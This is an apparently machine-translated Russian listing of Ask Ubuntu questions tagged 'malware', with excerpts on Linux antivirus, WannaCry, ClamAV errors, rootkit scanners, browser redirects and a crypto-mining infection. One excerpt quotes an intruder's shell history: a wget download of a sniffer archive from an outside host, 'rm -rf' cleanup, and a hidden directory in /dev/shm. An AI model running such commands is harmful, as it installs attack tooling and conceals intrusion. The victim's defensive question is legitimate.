Вопросы с тегом «malware»

Вопросы, касающиеся вредоносного программного обеспечения

223
Нужно ли устанавливать антивирус? [закрыто]

Я думал, что нет необходимости сканировать вирусы ни в Ubuntu, ни в каких-либо дистрибутивах Linux, пока я вчера не нашел пакеты антивирусных сканеров clamtkи klamavв программном центре Ubuntu. Это приводит к следующим вопросам: Как вирусы отличаются между Linux и Windows? Чем отличаются стратегии...

64
Уведомление о том, что «новый вирус - это кража данных!» В Ubuntu 18

Недавно, когда я открываю Firefox, я получаю сообщение в центре уведомлений. Это не всегда одно и то же, и оно постоянно меняется. вот пример: Это не всегда так. Он также дает другие сообщения, и когда я нажимаю на него, он отправляет меня на фишинговые сайты. Я не знаю, как я это получил. Может ли...

64
Какое возможное влияние вымогателей «Wanna Cry» на пользователей Linux?

Просто стало известно, что вы должны заплатить 300 долларов, потому что вымогатель, предназначенный для Microsoft Windows, зашифровал ваши данные. Какие действия необходимо предпринять пользователям Linux, если, например, они используют wine? Широко распространено мнение, что этот вымогатель...

50
Может ли вирус Windows перенести в Ubuntu?

До того, как я удалил Windows 7 со своего компьютера и заменил его на Ubuntu, у меня было более 257 угроз, которые никогда не исчезнут. Я не знаю, смог бы ли перенести троянский конь, который у меня был, на Ubuntu. Может ли мой компьютер быть заражен? Я стараюсь быть очень осторожным, когда...

49
clamav - ОШИБКА: /var/log/clamav/freshclam.log заблокирован другим процессом?

Я установил clamavи хочу обновить файлы, которые он использует для идентификации вирусов: $ sudo freshclam ERROR: /var/log/clamav/freshclam.log is locked by another process ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log). Что мне делать с этой ошибкой?...

25
chkrootkit показывает «tcpd» как зараженный. Это ложный положительный результат?

Сканирование с помощью chkrootkit показывает "tcpd" как зараженный. Хотя сканирование rkhunter показывает нормально, (за исключением обычных ложных срабатываний) Должен ли я волноваться? (Я на Ubuntu 16.10 с...

24
Нашел SSH Backdoor на VServer. Что делать?

Вчера я проверил свою историю команд на моем VServer. Я нашел несколько подозрительных строк. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget...

23
Где я могу найти вредоносные программы, которые могли быть установлены на моем компьютере?

Я хочу проанализировать мой ящик с Ubuntu, чтобы определить, был ли он взломан. У меня вопрос: где искать, где запускается какое-либо вредоносное ПО? Ниже приведен какой-то необработанный список: MBR образ ядра (у меня md5) / sbin / init (у меня есть md5) Модули ядра в / etc / modules все сценарии...

20
Основанный на подписи сканер руткитов?

В настоящее время единственные известные мне сканеры руткитов должны быть установлены на компьютере перед руткитом, чтобы они могли сравнивать изменения файлов и т. Д. (Например, chkrootkitи rkhunter), но мне действительно нужно иметь возможность сканировать мою машину и другие машины. из LiveUSB,...

19
Может ли антивирус защитить меня от KillDisk, вредоносного ПО для Linux?

Мой родственник недавно прислал мне письмо. Недавно он натолкнулся на этот тревожный заголовок от антивирусного производителя ESET: KillDisk теперь нацелен на Linux: требует выкуп в 250 тысяч долларов, но не может расшифровать Далее в электронном письме описывается часть программного обеспечения,...

19
Перенаправление на «http://domain-error.com»

Меня перенаправляют на сайт " http://domain-error.com ". Это происходит в Firefox, Chromium, Google Chrome и т. Д. Я чувствую, что на меня напал вирус или что-то подобное. Обновление: перенаправление происходит довольно часто, но не всегда и происходит во всех браузерах. Диспетчер дополнений...

17
Неожиданные арабские сообщения под указателем мыши в LibreOffice - это вирус?

Это странно Сегодня я открыл файл Excel с LibreOffice. Внезапно я увидел, что мышь поменяла цвет, и к ней прикрепилось сообщение на арабском языке, которое менялось каждую секунду в цикле. Я действительно могу читать по-арабски, поэтому я сразу же узнал это как исламские послания, восхваляющие...

16
Почему «приложение Ubuntu» имеет полный доступ к моей учетной записи Google?

Та же (или похожая) тема уже была рассмотрена в Ask Ubuntu некоторое время назад: Ubuntu 17.04 Chromium Browser спокойно предоставляет полный доступ к аккаунту Google Я только что выполнил новую чистую установку Ubuntu 16.04. К моему удивлению, «приложение Ubuntu» все еще появлялось и имеет полный...

16
Как обнаружить и удалить трояна Linux?

Я недавно (повторно) наткнулся на это: троян Linux остается незамеченным в течение почти года (Unreal IRCd) Да, я знаю, что добавление некоторого случайного PPA / программного обеспечения из ненадежного источника вызывает проблемы (или хуже). Я никогда не делаю этого, но многие делают (многие блоги...

15
ClamAV: freshclam зависает и использует 100% CPU

Я пытаюсь обновить базу данных ClamAV, запустив freshclam. daily-*.cdiffЗагружается успешно, но затем процесс зависает. Процессор максимально загружен на 100%, но обновление просто не закончится. Я отменил процесс с Ctrl+ Cпосле ок. 10 минут. Вот результат моей попытки обновления: # freshclam...

15
Удалить директорию RECYCLER с зараженной вирусом флешки

Прежде чем вы посоветуете мне возможность сохранить мои файлы и отформатировать диск с помощью gparted , пожалуйста, поймите, что я мог бы сделать это несколько часов назад, и это заняло бы всего несколько минут. На самом деле, я хочу понять, что на самом деле здесь происходит. Ситуация разрушает...

14
Вирус crond64 / tsm в Ubuntu

Недавно я заметил, что мой домашний сервер стал мучительно медленным. Все ресурсы были съедены двумя процессами: crond64и tsm. Хотя я неоднократно убивал их, они продолжали появляться снова и снова. В то же время мой провайдер уведомлял меня о злоупотреблении, исходящем из моего IP-адреса:...